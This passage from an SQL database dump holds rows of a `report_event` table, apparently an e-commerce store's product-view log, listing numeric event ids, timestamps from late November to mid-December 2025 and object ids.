(22705, '2025-11-28 15:54:22', 1, 2064, 0, 1, 1),
(22706, '2025-11-28 16:41:16', 1, 2055, 0, 1, 1),
(22707, '2025-11-28 16:46:29', 1, 2054, 0, 1, 1),
(22708, '2025-11-28 18:38:44', 1, 2064, 0, 1, 1),
(22709, '2025-11-28 18:53:02', 1, 2054, 0, 1, 1),
(22710, '2025-11-28 19:31:14', 1, 2054, 0, 1, 1),
(22711, '2025-11-28 20:29:30', 1, 2054, 0, 1, 1),
(22712, '2025-11-28 21:02:19', 1, 2059, 0, 1, 1),
(22713, '2025-11-28 21:51:57', 1, 2054, 0, 1, 1),
(22714, '2025-11-28 22:39:37', 1, 2064, 0, 1, 1),
(22715, '2025-11-28 22:40:17', 1, 2060, 0, 1, 1),
(22716, '2025-11-29 00:30:18', 1, 2064, 0, 1, 1),
(22717, '2025-11-29 00:50:33', 1, 2059, 0, 1, 1),
(22718, '2025-11-29 01:09:55', 1, 2060, 0, 1, 1),
(22719, '2025-11-29 02:03:44', 1, 2054, 0, 1, 1),
(22720, '2025-11-29 02:08:38', 1, 2062, 0, 1, 1),
(22721, '2025-11-29 02:52:28', 1, 2060, 0, 1, 1),
(22722, '2025-11-29 03:51:52', 1, 2064, 0, 1, 1),
(22723, '2025-11-29 04:02:04', 1, 2055, 0, 1, 1),
(22724, '2025-11-29 04:36:09', 1, 2061, 0, 1, 1),
(22725, '2025-11-29 05:33:00', 1, 2058, 0, 1, 1),
(22726, '2025-11-29 05:42:23', 1, 2061, 0, 1, 1),
(22727, '2025-11-29 11:17:12', 1, 2055, 0, 1, 1),
(22728, '2025-11-29 12:07:27', 1, 2060, 0, 1, 1),
(22729, '2025-11-29 12:08:00', 1, 2055, 0, 1, 1),
(22730, '2025-11-29 13:37:26', 1, 2064, 0, 1, 1),
(22731, '2025-11-29 13:38:19', 1, 2062, 0, 1, 1),
(22732, '2025-11-29 15:37:55', 1, 2064, 0, 1, 1),
(22733, '2025-11-29 16:57:05', 1, 2061, 0, 1, 1),
(22734, '2025-11-29 17:30:31', 1, 2054, 0, 1, 1),
(22735, '2025-11-29 18:31:58', 1, 2060, 0, 1, 1),
(22736, '2025-11-29 18:34:56', 1, 2054, 0, 1, 1),
(22737, '2025-11-29 19:40:07', 1, 2064, 0, 1, 1),
(22738, '2025-11-30 00:26:54', 1, 2054, 0, 1, 1),
(22739, '2025-11-30 00:47:14', 1, 2064, 0, 1, 1),
(22740, '2025-11-30 01:19:35', 1, 2061, 0, 1, 1),
(22741, '2025-11-30 02:50:11', 1, 2053, 0, 1, 1),
(22742, '2025-11-30 05:46:57', 1, 2064, 0, 1, 1),
(22743, '2025-11-30 05:52:13', 1, 2054, 0, 1, 1),
(22744, '2025-11-30 06:49:18', 1, 2060, 0, 1, 1),
(22745, '2025-11-30 06:49:25', 1, 2059, 0, 1, 1),
(22746, '2025-11-30 07:29:21', 1, 2059, 0, 1, 1),
(22747, '2025-11-30 07:32:59', 1, 2058, 0, 1, 1),
(22748, '2025-11-30 07:39:11', 1, 2064, 0, 1, 1),
(22749, '2025-11-30 08:02:17', 1, 2060, 0, 1, 1),
(22750, '2025-11-30 08:22:29', 1, 2062, 0, 1, 1),
(22751, '2025-11-30 08:31:23', 1, 2063, 0, 1, 1),
(22752, '2025-11-30 10:45:23', 1, 2062, 0, 1, 1),
(22753, '2025-11-30 11:46:21', 1, 2064, 0, 1, 1),
(22754, '2025-11-30 13:28:12', 1, 2063, 0, 1, 1),
(22755, '2025-11-30 13:28:16', 1, 2055, 0, 1, 1),
(22756, '2025-11-30 13:38:09', 1, 2060, 0, 1, 1),
(22757, '2025-11-30 13:49:48', 1, 2063, 0, 1, 1),
(22758, '2025-11-30 17:30:07', 1, 2064, 0, 1, 1),
(22759, '2025-11-30 18:38:33', 1, 2062, 0, 1, 1),
(22760, '2025-11-30 18:40:01', 1, 2064, 0, 1, 1),
(22761, '2025-11-30 19:29:21', 1, 2054, 0, 1, 1),
(22762, '2025-11-30 19:50:50', 1, 2062, 0, 1, 1),
(22763, '2025-11-30 21:17:39', 1, 2054, 0, 1, 1),
(22764, '2025-11-30 22:15:29', 1, 2053, 0, 1, 1),
(22765, '2025-11-30 22:32:07', 1, 2062, 0, 1, 1),
(22766, '2025-12-01 04:53:55', 1, 2058, 0, 1, 1),
(22767, '2025-12-01 06:06:35', 1, 2064, 0, 1, 1),
(22768, '2025-12-01 06:07:52', 1, 2054, 0, 1, 1),
(22769, '2025-12-01 06:11:09', 1, 2053, 0, 1, 1),
(22770, '2025-12-01 07:34:09', 1, 2064, 0, 1, 1),
(22771, '2025-12-01 07:43:22', 1, 2062, 0, 1, 1),
(22772, '2025-12-01 07:51:50', 1, 2059, 0, 1, 1),
(22773, '2025-12-01 07:53:53', 1, 2060, 0, 1, 1),
(22774, '2025-12-01 09:00:21', 1, 2060, 0, 1, 1),
(22775, '2025-12-01 17:07:04', 1, 2064, 0, 1, 1),
(22776, '2025-12-01 19:50:27', 1, 2054, 0, 1, 1),
(22777, '2025-12-01 19:50:32', 1, 2058, 0, 1, 1),
(22778, '2025-12-01 20:04:38', 1, 2054, 0, 1, 1),
(22779, '2025-12-01 20:53:36', 1, 2064, 0, 1, 1),
(22780, '2025-12-01 21:59:53', 1, 2060, 0, 1, 1),
(22781, '2025-12-01 22:13:52', 1, 2060, 0, 1, 1),
(22782, '2025-12-02 00:33:22', 1, 2064, 0, 1, 1),
(22783, '2025-12-02 02:39:53', 1, 2059, 0, 1, 1),
(22784, '2025-12-02 03:06:14', 1, 2053, 0, 1, 1),
(22785, '2025-12-02 06:10:46', 1, 2054, 0, 1, 1),
(22786, '2025-12-02 09:06:51', 1, 2054, 0, 1, 1),
(22787, '2025-12-02 09:34:52', 1, 2060, 0, 1, 1),
(22788, '2025-12-02 09:51:26', 1, 2060, 0, 1, 1),
(22789, '2025-12-02 13:42:45', 1, 2060, 0, 1, 1),
(22790, '2025-12-02 14:34:20', 1, 2064, 0, 1, 1),
(22791, '2025-12-02 15:14:01', 1, 2054, 0, 1, 1),
(22792, '2025-12-02 15:53:19', 1, 2064, 0, 1, 1),
(22793, '2025-12-02 17:04:27', 1, 2064, 0, 1, 1),
(22794, '2025-12-02 17:56:24', 1, 2061, 0, 1, 1),
(22795, '2025-12-02 19:29:58', 1, 2062, 0, 1, 1),
(22796, '2025-12-02 20:13:25', 1, 2064, 0, 1, 1),
(22797, '2025-12-02 20:31:41', 1, 2064, 0, 1, 1),
(22798, '2025-12-02 20:41:53', 1, 2063, 0, 1, 1),
(22799, '2025-12-02 20:54:47', 1, 2054, 0, 1, 1),
(22800, '2025-12-02 20:54:56', 1, 2054, 0, 1, 1),
(22801, '2025-12-02 21:29:23', 1, 2060, 0, 1, 1),
(22802, '2025-12-02 22:19:18', 1, 2059, 0, 1, 1),
(22803, '2025-12-02 22:59:50', 1, 2061, 0, 1, 1),
(22804, '2025-12-02 23:42:16', 1, 2060, 0, 1, 1),
(22805, '2025-12-03 02:22:32', 1, 2064, 0, 1, 1),
(22806, '2025-12-03 02:42:26', 1, 2060, 0, 1, 1),
(22807, '2025-12-03 05:30:01', 1, 2054, 0, 1, 1),
(22808, '2025-12-03 06:28:49', 1, 2063, 0, 1, 1),
(22809, '2025-12-03 06:35:50', 1, 2064, 0, 1, 1),
(22810, '2025-12-03 06:38:27', 1, 2064, 0, 1, 1),
(22811, '2025-12-03 07:06:38', 1, 2064, 0, 1, 1),
(22812, '2025-12-03 07:07:13', 1, 2054, 0, 1, 1),
(22813, '2025-12-03 07:30:50', 1, 2064, 0, 1, 1),
(22814, '2025-12-03 12:00:50', 1, 2064, 0, 1, 1),
(22815, '2025-12-03 13:56:53', 1, 2060, 0, 1, 1),
(22816, '2025-12-03 14:36:02', 1, 2061, 0, 1, 1),
(22817, '2025-12-03 14:47:07', 1, 2058, 0, 1, 1),
(22818, '2025-12-03 15:26:58', 1, 2061, 0, 1, 1),
(22819, '2025-12-03 15:47:00', 1, 2058, 0, 1, 1),
(22820, '2025-12-03 15:47:07', 1, 2054, 0, 1, 1),
(22821, '2025-12-03 17:01:53', 1, 2062, 0, 1, 1),
(22822, '2025-12-03 17:03:02', 1, 2064, 0, 1, 1),
(22823, '2025-12-03 17:19:34', 1, 2064, 0, 1, 1),
(22824, '2025-12-03 17:47:23', 1, 2059, 0, 1, 1),
(22825, '2025-12-03 18:39:56', 1, 2054, 0, 1, 1),
(22826, '2025-12-03 18:43:00', 1, 2061, 0, 1, 1),
(22827, '2025-12-03 18:53:33', 1, 2060, 0, 1, 1),
(22828, '2025-12-03 20:06:39', 1, 2058, 0, 1, 1),
(22829, '2025-12-03 23:24:18', 1, 2064, 0, 1, 1),
(22830, '2025-12-03 23:27:15', 1, 2060, 0, 1, 1),
(22831, '2025-12-04 00:29:43', 1, 2060, 0, 1, 1),
(22832, '2025-12-04 01:33:44', 1, 2061, 0, 1, 1),
(22833, '2025-12-04 02:05:19', 1, 2054, 0, 1, 1),
(22834, '2025-12-04 02:32:10', 1, 2061, 0, 1, 1),
(22835, '2025-12-04 05:10:18', 1, 2064, 0, 1, 1),
(22836, '2025-12-04 06:18:21', 1, 2054, 0, 1, 1),
(22837, '2025-12-04 06:35:52', 1, 2064, 0, 1, 1),
(22838, '2025-12-04 07:34:35', 1, 2064, 0, 1, 1),
(22839, '2025-12-04 07:52:45', 1, 2059, 0, 1, 1),
(22840, '2025-12-04 08:04:28', 1, 2055, 0, 1, 1),
(22841, '2025-12-04 08:14:34', 1, 2054, 0, 1, 1),
(22842, '2025-12-04 08:25:42', 1, 2060, 0, 1, 1),
(22843, '2025-12-04 09:13:37', 1, 2054, 0, 1, 1),
(22844, '2025-12-04 10:06:29', 1, 2064, 0, 1, 1),
(22845, '2025-12-04 10:33:11', 1, 2064, 0, 1, 1),
(22846, '2025-12-04 10:33:37', 1, 2064, 5027, 1, 1),
(22847, '2025-12-04 11:31:15', 1, 2061, 0, 1, 1),
(22848, '2025-12-04 11:58:34', 1, 2054, 0, 1, 1),
(22849, '2025-12-04 12:03:33', 1, 2055, 0, 1, 1),
(22850, '2025-12-04 12:03:39', 1, 2063, 0, 1, 1),
(22851, '2025-12-04 12:03:42', 1, 2062, 0, 1, 1),
(22852, '2025-12-04 12:03:45', 1, 2060, 0, 1, 1),
(22853, '2025-12-04 12:38:28', 1, 2054, 0, 1, 1),
(22854, '2025-12-04 13:39:23', 1, 2064, 0, 1, 1),
(22855, '2025-12-04 15:59:03', 1, 2059, 0, 1, 1),
(22856, '2025-12-04 16:20:58', 1, 2064, 0, 1, 1),
(22857, '2025-12-04 17:06:36', 1, 2055, 0, 1, 1),
(22858, '2025-12-04 17:50:33', 1, 2064, 0, 1, 1),
(22859, '2025-12-04 18:50:52', 1, 2058, 0, 1, 1),
(22860, '2025-12-04 19:32:50', 1, 2060, 0, 1, 1),
(22861, '2025-12-04 20:13:31', 1, 2054, 0, 1, 1),
(22862, '2025-12-04 21:36:49', 1, 2062, 0, 1, 1),
(22863, '2025-12-04 22:43:37', 1, 2062, 0, 1, 1),
(22864, '2025-12-04 22:43:41', 1, 2063, 0, 1, 1),
(22865, '2025-12-04 22:43:48', 1, 2061, 0, 1, 1),
(22866, '2025-12-04 22:51:17', 1, 2060, 0, 1, 1),
(22867, '2025-12-04 23:12:55', 1, 2054, 0, 1, 1),
(22868, '2025-12-05 00:18:32', 1, 2054, 0, 1, 1),
(22869, '2025-12-05 01:39:16', 1, 2059, 0, 1, 1),
(22870, '2025-12-05 03:30:25', 1, 2060, 0, 1, 1),
(22871, '2025-12-05 04:16:42', 1, 2064, 0, 1, 1),
(22872, '2025-12-05 06:35:51', 1, 2064, 0, 1, 1),
(22873, '2025-12-05 09:04:38', 1, 2060, 0, 1, 1),
(22874, '2025-12-05 09:10:38', 1, 2064, 0, 1, 1),
(22875, '2025-12-05 09:38:45', 1, 2055, 0, 1, 1),
(22876, '2025-12-05 09:44:34', 1, 2064, 0, 1, 1),
(22877, '2025-12-05 10:45:25', 1, 2064, 0, 1, 1),
(22878, '2025-12-05 12:04:34', 1, 2054, 0, 1, 1),
(22879, '2025-12-05 15:46:22', 1, 2064, 0, 1, 1),
(22880, '2025-12-05 20:32:43', 1, 2060, 0, 1, 1),
(22881, '2025-12-05 20:32:46', 1, 2054, 0, 1, 1),
(22882, '2025-12-05 21:06:28', 1, 2064, 0, 1, 1),
(22883, '2025-12-05 21:06:32', 1, 2059, 0, 1, 1),
(22884, '2025-12-05 21:06:32', 1, 2062, 0, 1, 1),
(22885, '2025-12-05 21:06:32', 1, 2064, 0, 1, 1),
(22886, '2025-12-05 21:06:32', 1, 2058, 0, 1, 1),
(22887, '2025-12-05 21:06:32', 1, 2061, 0, 1, 1),
(22888, '2025-12-05 21:06:32', 1, 2063, 0, 1, 1),
(22889, '2025-12-05 21:06:33', 1, 2064, 0, 1, 1),
(22890, '2025-12-05 21:07:03', 1, 2060, 0, 1, 1),
(22891, '2025-12-05 21:07:12', 1, 2054, 0, 1, 1),
(22892, '2025-12-05 21:07:13', 1, 2055, 0, 1, 1),
(22893, '2025-12-05 21:07:14', 1, 2053, 0, 1, 1),
(22894, '2025-12-05 21:07:16', 1, 2060, 0, 1, 1),
(22895, '2025-12-05 21:07:17', 1, 2064, 0, 1, 1),
(22896, '2025-12-05 21:07:22', 1, 2054, 0, 1, 1),
(22897, '2025-12-05 21:07:23', 1, 2053, 0, 1, 1),
(22898, '2025-12-05 21:07:24', 1, 2055, 0, 1, 1),
(22899, '2025-12-05 21:07:26', 1, 2053, 0, 1, 1),
(22900, '2025-12-05 21:13:47', 1, 2061, 0, 1, 1),
(22901, '2025-12-05 21:34:14', 1, 2062, 0, 1, 1),
(22902, '2025-12-05 21:40:03', 1, 2054, 0, 1, 1),
(22903, '2025-12-05 22:18:41', 1, 2060, 0, 1, 1),
(22904, '2025-12-05 23:10:59', 1, 2064, 0, 1, 1),
(22905, '2025-12-05 23:37:16', 1, 2054, 0, 1, 1),
(22906, '2025-12-05 23:57:15', 1, 2054, 0, 1, 1),
(22907, '2025-12-06 00:19:48', 1, 2059, 0, 1, 1),
(22908, '2025-12-06 01:13:38', 1, 2064, 0, 1, 1),
(22909, '2025-12-06 03:19:38', 1, 2064, 0, 1, 1),
(22910, '2025-12-06 04:32:38', 1, 2064, 0, 1, 1),
(22911, '2025-12-06 08:37:06', 1, 2058, 0, 1, 1),
(22912, '2025-12-06 08:57:42', 1, 2060, 0, 1, 1),
(22913, '2025-12-06 10:30:36', 1, 2054, 0, 1, 1),
(22914, '2025-12-06 11:51:19', 1, 2060, 0, 1, 1),
(22915, '2025-12-06 12:01:40', 1, 2055, 0, 1, 1),
(22916, '2025-12-06 12:07:57', 1, 2055, 0, 1, 1),
(22917, '2025-12-06 12:13:19', 1, 2064, 0, 1, 1),
(22918, '2025-12-06 12:36:59', 1, 2063, 0, 1, 1),
(22919, '2025-12-06 12:38:30', 1, 2064, 0, 1, 1),
(22920, '2025-12-06 13:40:24', 1, 2064, 0, 1, 1),
(22921, '2025-12-06 13:54:49', 1, 2054, 0, 1, 1),
(22922, '2025-12-06 14:06:50', 1, 2064, 0, 1, 1),
(22923, '2025-12-06 17:09:11', 1, 2063, 0, 1, 1),
(22924, '2025-12-06 17:18:24', 1, 2055, 0, 1, 1),
(22925, '2025-12-06 19:06:41', 1, 2062, 0, 1, 1),
(22926, '2025-12-06 19:07:59', 1, 2064, 0, 1, 1),
(22927, '2025-12-06 19:12:18', 1, 2053, 0, 1, 1),
(22928, '2025-12-06 20:28:48', 1, 2063, 0, 1, 1),
(22929, '2025-12-06 20:56:04', 1, 2060, 0, 1, 1),
(22930, '2025-12-06 21:46:20', 1, 2053, 0, 1, 1),
(22931, '2025-12-06 22:21:46', 1, 2055, 0, 1, 1),
(22932, '2025-12-06 22:38:17', 1, 2053, 0, 1, 1),
(22933, '2025-12-06 23:00:55', 1, 2064, 0, 1, 1),
(22934, '2025-12-06 23:07:59', 1, 2059, 0, 1, 1),
(22935, '2025-12-06 23:09:09', 1, 2062, 0, 1, 1),
(22936, '2025-12-06 23:14:28', 1, 2058, 0, 1, 1),
(22937, '2025-12-06 23:15:07', 1, 2063, 0, 1, 1),
(22938, '2025-12-07 00:14:43', 1, 2054, 0, 1, 1),
(22939, '2025-12-07 00:19:10', 1, 2053, 0, 1, 1),
(22940, '2025-12-07 01:39:27', 1, 2053, 0, 1, 1),
(22941, '2025-12-07 03:02:06', 1, 2064, 0, 1, 1),
(22942, '2025-12-07 03:05:06', 1, 2062, 0, 1, 1),
(22943, '2025-12-07 03:27:00', 1, 2060, 0, 1, 1),
(22944, '2025-12-07 03:54:27', 1, 2064, 0, 1, 1),
(22945, '2025-12-07 04:44:55', 1, 2064, 0, 1, 1),
(22946, '2025-12-07 05:51:00', 1, 2054, 0, 1, 1),
(22947, '2025-12-07 09:01:14', 1, 2054, 0, 1, 1),
(22948, '2025-12-07 12:22:27', 1, 2060, 0, 1, 1),
(22949, '2025-12-07 13:34:48', 1, 2064, 0, 1, 1),
(22950, '2025-12-07 15:52:54', 1, 2064, 0, 1, 1),
(22951, '2025-12-07 15:54:52', 1, 2064, 0, 1, 1),
(22952, '2025-12-07 16:34:30', 1, 2055, 0, 1, 1),
(22953, '2025-12-07 16:37:24', 1, 2064, 0, 1, 1),
(22954, '2025-12-07 16:38:30', 1, 2060, 0, 1, 1),
(22955, '2025-12-07 21:37:45', 1, 2054, 0, 1, 1),
(22956, '2025-12-07 21:42:10', 1, 2062, 0, 1, 1),
(22957, '2025-12-07 23:09:30', 1, 2059, 0, 1, 1),
(22958, '2025-12-07 23:25:59', 1, 2054, 0, 1, 1),
(22959, '2025-12-07 23:50:32', 1, 2060, 0, 1, 1),
(22960, '2025-12-08 01:13:34', 1, 2054, 0, 1, 1),
(22961, '2025-12-08 02:22:21', 1, 2064, 0, 1, 1),
(22962, '2025-12-08 02:23:04', 1, 2062, 0, 1, 1),
(22963, '2025-12-08 02:23:28', 1, 2063, 0, 1, 1),
(22964, '2025-12-08 02:23:35', 1, 2061, 0, 1, 1),
(22965, '2025-12-08 02:23:41', 1, 2059, 0, 1, 1),
(22966, '2025-12-08 02:23:47', 1, 2058, 0, 1, 1),
(22967, '2025-12-08 02:23:53', 1, 2055, 0, 1, 1),
(22968, '2025-12-08 02:23:59', 1, 2054, 0, 1, 1),
(22969, '2025-12-08 02:24:03', 1, 2060, 0, 1, 1),
(22970, '2025-12-08 02:48:51', 1, 2064, 0, 1, 1),
(22971, '2025-12-08 03:43:48', 1, 2054, 0, 1, 1),
(22972, '2025-12-08 04:36:16', 1, 2061, 0, 1, 1),
(22973, '2025-12-08 05:38:50', 1, 2064, 0, 1, 1),
(22974, '2025-12-08 06:48:07', 1, 2060, 0, 1, 1),
(22975, '2025-12-08 06:48:10', 1, 2059, 0, 1, 1),
(22976, '2025-12-08 07:03:09', 1, 2060, 0, 1, 1),
(22977, '2025-12-08 07:47:20', 1, 2064, 0, 1, 1),
(22978, '2025-12-08 07:57:11', 1, 2063, 0, 1, 1),
(22979, '2025-12-08 08:17:28', 1, 2064, 0, 1, 1),
(22980, '2025-12-08 08:57:05', 1, 2063, 0, 1, 1),
(22981, '2025-12-08 09:15:02', 1, 2054, 0, 1, 1),
(22982, '2025-12-08 09:26:45', 1, 2061, 0, 1, 1),
(22983, '2025-12-08 09:46:23', 1, 2058, 0, 1, 1),
(22984, '2025-12-08 13:35:17', 1, 2064, 0, 1, 1),
(22985, '2025-12-08 14:14:08', 1, 2060, 0, 1, 1),
(22986, '2025-12-08 14:15:13', 1, 2054, 0, 1, 1),
(22987, '2025-12-08 14:44:11', 1, 2053, 0, 1, 1),
(22988, '2025-12-08 14:52:17', 1, 2053, 0, 1, 1),
(22989, '2025-12-08 14:56:02', 1, 2053, 0, 1, 1),
(22990, '2025-12-08 15:05:33', 1, 2064, 0, 1, 1),
(22991, '2025-12-08 15:08:40', 1, 2053, 0, 1, 1),
(22992, '2025-12-08 15:56:29', 1, 2064, 0, 1, 1),
(22993, '2025-12-08 16:15:13', 1, 2060, 0, 1, 1),
(22994, '2025-12-08 17:43:31', 1, 2053, 0, 1, 1),
(22995, '2025-12-08 19:48:50', 1, 2054, 0, 1, 1),
(22996, '2025-12-08 19:48:53', 1, 2058, 0, 1, 1),
(22997, '2025-12-08 22:29:31', 1, 2064, 0, 1, 1),
(22998, '2025-12-08 22:43:20', 1, 2062, 0, 1, 1),
(22999, '2025-12-08 23:50:12', 1, 2060, 0, 1, 1),
(23000, '2025-12-08 23:52:58', 1, 2055, 0, 1, 1),
(23001, '2025-12-08 23:53:37', 1, 2064, 0, 1, 1),
(23002, '2025-12-09 00:01:30', 1, 2054, 0, 1, 1),
(23003, '2025-12-09 00:24:53', 1, 2064, 0, 1, 1),
(23004, '2025-12-09 01:02:19', 1, 2054, 0, 1, 1),
(23005, '2025-12-09 02:13:25', 1, 2053, 0, 1, 1),
(23006, '2025-12-09 03:45:44', 1, 2063, 0, 1, 1),
(23007, '2025-12-09 03:54:14', 1, 2054, 0, 1, 1),
(23008, '2025-12-09 03:54:17', 1, 2054, 0, 1, 1),
(23009, '2025-12-09 04:00:14', 1, 2063, 0, 1, 1),
(23010, '2025-12-09 04:38:04', 1, 2054, 0, 1, 1),
(23011, '2025-12-09 06:49:56', 1, 2064, 0, 1, 1),
(23012, '2025-12-09 07:11:27', 1, 2063, 0, 1, 1),
(23013, '2025-12-09 07:55:04', 1, 2064, 0, 1, 1),
(23014, '2025-12-09 08:17:10', 1, 2064, 0, 1, 1),
(23015, '2025-12-09 08:20:59', 1, 2063, 0, 1, 1),
(23016, '2025-12-09 08:37:49', 1, 2059, 0, 1, 1),
(23017, '2025-12-09 08:43:58', 1, 2054, 0, 1, 1),
(23018, '2025-12-09 09:36:01', 1, 2059, 0, 1, 1),
(23019, '2025-12-09 13:03:11', 1, 2060, 0, 1, 1),
(23020, '2025-12-09 13:09:17', 1, 2064, 0, 1, 1),
(23021, '2025-12-09 13:30:35', 1, 2059, 0, 1, 1),
(23022, '2025-12-09 13:41:35', 1, 2060, 0, 1, 1),
(23023, '2025-12-09 13:47:09', 1, 2060, 0, 1, 1),
(23024, '2025-12-09 14:22:04', 1, 2064, 0, 1, 1),
(23025, '2025-12-09 17:36:30', 1, 2060, 0, 1, 1),
(23026, '2025-12-09 17:47:17', 1, 2063, 0, 1, 1),
(23027, '2025-12-09 18:14:33', 1, 2058, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(23028, '2025-12-09 19:01:12', 1, 2054, 0, 1, 1),
(23029, '2025-12-09 19:03:55', 1, 2055, 0, 1, 1),
(23030, '2025-12-09 19:08:54', 1, 2064, 0, 1, 1),
(23031, '2025-12-09 19:21:40', 1, 2054, 0, 1, 1),
(23032, '2025-12-09 20:30:23', 1, 2064, 0, 1, 1),
(23033, '2025-12-09 20:30:40', 1, 2061, 0, 1, 1),
(23034, '2025-12-09 20:32:01', 1, 2055, 0, 1, 1),
(23035, '2025-12-09 20:51:17', 1, 2063, 0, 1, 1),
(23036, '2025-12-09 21:02:40', 1, 2061, 0, 1, 1),
(23037, '2025-12-09 21:34:20', 1, 2063, 0, 1, 1),
(23038, '2025-12-09 21:48:38', 1, 2060, 0, 1, 1),
(23039, '2025-12-09 21:58:43', 1, 2063, 0, 1, 1),
(23040, '2025-12-09 22:23:33', 1, 2064, 0, 1, 1),
(23041, '2025-12-09 22:35:35', 1, 2060, 0, 1, 1),
(23042, '2025-12-09 22:46:14', 1, 2063, 0, 1, 1),
(23043, '2025-12-09 23:12:02', 1, 2058, 0, 1, 1),
(23044, '2025-12-09 23:25:47', 1, 2053, 0, 1, 1),
(23045, '2025-12-09 23:57:22', 1, 2055, 0, 1, 1),
(23046, '2025-12-10 00:06:02', 1, 2060, 0, 1, 1),
(23047, '2025-12-10 00:13:48', 1, 2054, 0, 1, 1),
(23048, '2025-12-10 00:36:02', 1, 2062, 0, 1, 1),
(23049, '2025-12-10 01:04:08', 1, 2054, 0, 1, 1),
(23050, '2025-12-10 01:10:59', 1, 2055, 0, 1, 1),
(23051, '2025-12-10 01:20:45', 1, 2061, 0, 1, 1),
(23052, '2025-12-10 01:52:46', 1, 2059, 0, 1, 1),
(23053, '2025-12-10 02:04:44', 1, 2064, 0, 1, 1),
(23054, '2025-12-10 02:13:29', 1, 2062, 0, 1, 1),
(23055, '2025-12-10 02:33:19', 1, 2060, 0, 1, 1),
(23056, '2025-12-10 03:35:39', 1, 2060, 0, 1, 1),
(23057, '2025-12-10 03:45:12', 1, 2063, 0, 1, 1),
(23058, '2025-12-10 04:09:14', 1, 2058, 0, 1, 1),
(23059, '2025-12-10 04:53:09', 1, 2055, 0, 1, 1),
(23060, '2025-12-10 04:59:29', 1, 2064, 0, 1, 1),
(23061, '2025-12-10 05:08:18', 1, 2063, 0, 1, 1),
(23062, '2025-12-10 05:08:21', 1, 2062, 0, 1, 1),
(23063, '2025-12-10 05:08:24', 1, 2060, 0, 1, 1),
(23064, '2025-12-10 05:08:26', 1, 2059, 0, 1, 1),
(23065, '2025-12-10 06:05:08', 1, 2064, 0, 1, 1),
(23066, '2025-12-10 06:11:18', 1, 2061, 0, 1, 1),
(23067, '2025-12-10 06:14:48', 1, 2053, 0, 1, 1),
(23068, '2025-12-10 06:49:59', 1, 2059, 0, 1, 1),
(23069, '2025-12-10 06:51:23', 1, 2062, 0, 1, 1),
(23070, '2025-12-10 06:52:12', 1, 2058, 0, 1, 1),
(23071, '2025-12-10 06:52:13', 1, 2063, 0, 1, 1),
(23072, '2025-12-10 06:53:10', 1, 2053, 0, 1, 1),
(23073, '2025-12-10 06:53:20', 1, 2059, 0, 1, 1),
(23074, '2025-12-10 06:53:23', 1, 2061, 0, 1, 1),
(23075, '2025-12-10 06:53:26', 1, 2058, 0, 1, 1),
(23076, '2025-12-10 07:00:19', 1, 2062, 0, 1, 1),
(23077, '2025-12-10 08:22:50', 1, 2054, 0, 1, 1),
(23078, '2025-12-10 08:29:31', 1, 2053, 0, 1, 1),
(23079, '2025-12-10 08:40:48', 1, 2059, 0, 1, 1),
(23080, '2025-12-10 08:54:31', 1, 2064, 0, 1, 1),
(23081, '2025-12-10 09:14:51', 1, 2058, 0, 1, 1),
(23082, '2025-12-10 09:33:28', 1, 2053, 0, 1, 1),
(23083, '2025-12-10 09:34:37', 1, 2055, 0, 1, 1),
(23084, '2025-12-10 09:58:31', 1, 2061, 0, 1, 1),
(23085, '2025-12-10 10:33:54', 1, 2059, 0, 1, 1),
(23086, '2025-12-10 11:01:29', 1, 2064, 0, 1, 1),
(23087, '2025-12-10 11:01:58', 1, 2062, 0, 1, 1),
(23088, '2025-12-10 11:03:26', 1, 2054, 0, 1, 1),
(23089, '2025-12-10 11:05:28', 1, 2060, 0, 1, 1),
(23090, '2025-12-10 12:55:28', 1, 2055, 0, 1, 1),
(23091, '2025-12-10 13:04:26', 1, 2064, 0, 1, 1),
(23092, '2025-12-10 13:15:05', 1, 2063, 0, 1, 1),
(23093, '2025-12-10 13:20:48', 1, 2054, 0, 1, 1),
(23094, '2025-12-10 13:43:48', 1, 2064, 0, 1, 1),
(23095, '2025-12-10 14:32:21', 1, 2062, 0, 1, 1),
(23096, '2025-12-10 14:33:45', 1, 2064, 0, 1, 1),
(23097, '2025-12-10 15:13:44', 1, 2063, 0, 1, 1),
(23098, '2025-12-10 15:31:14', 1, 2064, 0, 1, 1),
(23099, '2025-12-10 15:55:34', 1, 2064, 0, 1, 1),
(23100, '2025-12-10 15:56:48', 1, 2064, 0, 1, 1),
(23101, '2025-12-10 16:03:00', 1, 2064, 0, 1, 1),
(23102, '2025-12-10 16:03:03', 1, 2063, 0, 1, 1),
(23103, '2025-12-10 16:03:04', 1, 2062, 0, 1, 1),
(23104, '2025-12-10 16:03:05', 1, 2061, 0, 1, 1),
(23105, '2025-12-10 16:03:06', 1, 2060, 0, 1, 1),
(23106, '2025-12-10 16:03:07', 1, 2059, 0, 1, 1),
(23107, '2025-12-10 16:03:08', 1, 2058, 0, 1, 1),
(23108, '2025-12-10 16:03:09', 1, 2055, 0, 1, 1),
(23109, '2025-12-10 16:03:10', 1, 2054, 0, 1, 1),
(23110, '2025-12-10 16:03:46', 1, 2053, 0, 1, 1),
(23111, '2025-12-10 16:04:16', 1, 2061, 0, 1, 1),
(23112, '2025-12-10 16:09:03', 1, 2062, 0, 1, 1),
(23113, '2025-12-10 16:53:23', 1, 2064, 0, 1, 1),
(23114, '2025-12-10 17:24:25', 1, 2053, 0, 1, 1),
(23115, '2025-12-10 17:43:23', 1, 2059, 0, 1, 1),
(23116, '2025-12-10 18:04:02', 1, 2064, 0, 1, 1),
(23117, '2025-12-10 18:36:02', 1, 2061, 0, 1, 1),
(23118, '2025-12-10 20:25:25', 1, 2058, 0, 1, 1),
(23119, '2025-12-10 21:05:46', 1, 2060, 0, 1, 1),
(23120, '2025-12-10 22:11:47', 1, 2054, 0, 1, 1),
(23121, '2025-12-10 23:00:28', 1, 2064, 0, 1, 1),
(23122, '2025-12-11 00:39:55', 1, 2062, 0, 1, 1),
(23123, '2025-12-11 02:25:23', 1, 2064, 0, 1, 1),
(23124, '2025-12-11 02:41:40', 1, 2059, 0, 1, 1),
(23125, '2025-12-11 02:49:37', 1, 2061, 0, 1, 1),
(23126, '2025-12-11 02:57:54', 1, 2060, 0, 1, 1),
(23127, '2025-12-11 03:10:03', 1, 2059, 0, 1, 1),
(23128, '2025-12-11 05:54:52', 1, 2060, 0, 1, 1),
(23129, '2025-12-11 07:05:01', 1, 2062, 0, 1, 1),
(23130, '2025-12-11 08:20:10', 1, 2054, 0, 1, 1),
